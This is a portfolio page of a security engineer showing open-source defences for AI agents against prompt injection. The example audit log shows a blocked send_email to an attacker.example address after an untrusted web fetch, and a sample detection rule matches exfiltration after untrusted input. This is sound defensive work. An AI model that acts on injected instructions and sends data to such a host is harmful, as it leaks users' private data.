Howard Hsieh

I build guardrails for AI agents.

Security engineer finishing an M.S. in Cyber Security Engineering at USC. My open-source work puts policy and detection between language models and the tools they call. Before that I ran cloud security for a startup and a 5 TB/day SIEM for enterprise clients.

Open to 2027 new-grad roles in security engineering, application security, cloud security and detection & response.

agent-policy-gateway / audit logExample trace

Untrusted data never reaches egress.

The gateway labels what each tool returns and checks every call against policy.

# policy.yaml
rules:
  - id: no-untrusted-to-egress
    deny_if: { tool: send_email, input_taint: untrusted:web }
ALLOWfetch_url("vendor-docs.example/pricing")untrusted:web
ALLOWread_file("notes/q3-plan.md")internal
ALLOWsummarize(page, notes)untrusted:web
DENYsend_email(to="ops@attacker.example")no-untrusted-to-egress
AgentDojo: attack success 100% → 0% over 588 episodes
TraceSig / rulesExample rule

Sigma-style rules for agent traces.

Normalize tool-call logs to JSONL, then match taint, sequence and frequency patterns.

title: Exfiltration after untrusted fetch
level: critical
detection:
  sequence:
    - { tool: fetch_url, taint: untrusted }
    - { tool: send_email, within: 3 }
MATCHtrace 7f3a, calls 4 → 6, level critical
EXIT 1tracesig scan --fail-on critical
12-rule starter pack, CI gate with --fail-onGitHub
agent-security-skills / checkupExample report
B

Grade your coding agent.

Seven skills for people who run Claude Code, Codex or Cursor.

✓MCP servers pinned to a hash lockfilesupply chain
✓Secrets kept out of agent configconfig
✕Shell tool runs without an allowlistruntime guard
✓Tool-call traces exported for detectionTraceSig
7 skills mapped to the OWASP Agentic Top 10GitHub

Open-source work on agent security.

Three projects that cover one problem from three sides: stop the bad tool call, detect it in the logs, and audit the agent before it runs.

PreventionPython, Apache-2.0v0.1 on PyPI

agent-policy-gatewayA policy-enforcement and information-flow-control gateway for AI agent tool calls.

  • Checks every tool call against declarative YAML policies, with adapters for MCP, OpenAI and Anthropic tool use.
  • Tracks taint across chained calls, so data from untrusted sources cannot reach sensitive tools. Prompt-injection exfiltration is stopped by design rather than by detection.
  • Ships with fail-closed audit logging, 1,400+ automated tests and an OIDC trusted-publishing release pipeline in GitHub Actions.
100% → 0%

attack success on AgentDojo across 588 attack episodes. Per-value taint kept 100% task utility at 0% compromise on a 90-scenario benchmark.

github.com/howardhsieh/agent-policy-gateway
DetectionPython rule engine and CLIApache-2.0

TraceSigSigma-style detection rules for AI agent tool-call traces.

  • An open rule format and reference engine that scans agent logs, normalized to a JSONL schema, for taint, selection, sequence and frequency patterns.
  • A 12-rule starter pack for prompt injection, data exfiltration and privilege escalation, plus a --fail-on mode that gates CI on critical findings.
github.com/howardhsieh/tracesig
AssuranceSkills pack and runtime guardApache-2.0

agent-security-skillsSecurity tooling for the people who run AI coding agents.

  • Seven skills: checkup with an A–F grade, supply-chain audit, config audit, threat model, MCP server review, trace detection and incident response.
  • A runtime guard plugin with provenance-aware permission rules, and a GitHub Action that turns the checkup into a CI gate.
github.com/howardhsieh/agent-security-skills

Where I’ve done the work.

Cloud security at a startup, research at a university lab, and a security operations seat watching enterprise logs.

May – Aug 2026Remote, USA

BranchmoreSecurity Engineering Intern

  • Replaced public SSH with a Tailscale zero-trust network, cutting public ingress to zero. CI deploys as ephemeral nodes, and production uses 12-hour just-in-time access.
  • Built a multi-account AWS platform in Terraform with GitOps, and gated high-blast-radius changes behind manual approval in GitHub Actions.
  • Deployed GuardDuty, Inspector, Prowler and Semgrep, and pen-tested Go and Elixir services, reporting path traversal, command injection and leaked secrets.
  • Closed 75 tickets across 4+ AWS accounts, each with a verification runbook, and ran a blue/green migration of the dev VPC.
Apr 2024 – Mar 2025Taichung, Taiwan

GMVR Lab, National Chung-Hsing UniversityResearch Assistant

  • Co-authored an IEEE Access (2025) paper on reversible data hiding with lossless image restoration.
  • Implemented the algorithm in Python and OpenCV, raising embedding capacity by 15% at PSNR above 60 dB.
Aug 2023 – Apr 2024Taipei, Taiwan

Systex CorporationSecurity Engineer

  • Managed Splunk SIEM for 15 enterprise clients, onboarding 5+ TB/day of Linux logs.
  • Wrote 70+ SPL correlation rules and dashboards, cutting false-positive alerts by about 30%.
  • Triaged 20+ alerts a week and led incident response for clients.

Education and tools.

Education

University of Southern CaliforniaM.S. in Cyber Security Engineering, GPA 3.67 / 4.00Aug 2025 – Jun 2027 (expected). Security Systems, Computer Systems Assurance, Security & Privacy, Computer Forensics.
National Chung-Hsing UniversityB.S. in Computer Science, GPA 3.70 / 4.30Sep 2019 – Jun 2023, Taichung, Taiwan
CertificationsSplunk Core Certified Power UserCompTIA SecAI+, in progress (Oct 2026)

Skills

Security
Zero trust, detection engineering (Splunk SPL, Sigma), incident response, threat modeling, SAST/SCA, CSPM, AI and LLM security
Cloud
AWS (IAM, SCPs, VPC, EC2, RDS, Lambda, Organizations, CloudTrail, GuardDuty), Terraform, Packer, Docker
Delivery
GitHub Actions, CI/CD, Linux, MCP and LLM tool use
Languages
Python, Bash, SQL, C/C++, Java

Let’s talk.

Howard standing on a sidewalk in Los Angeles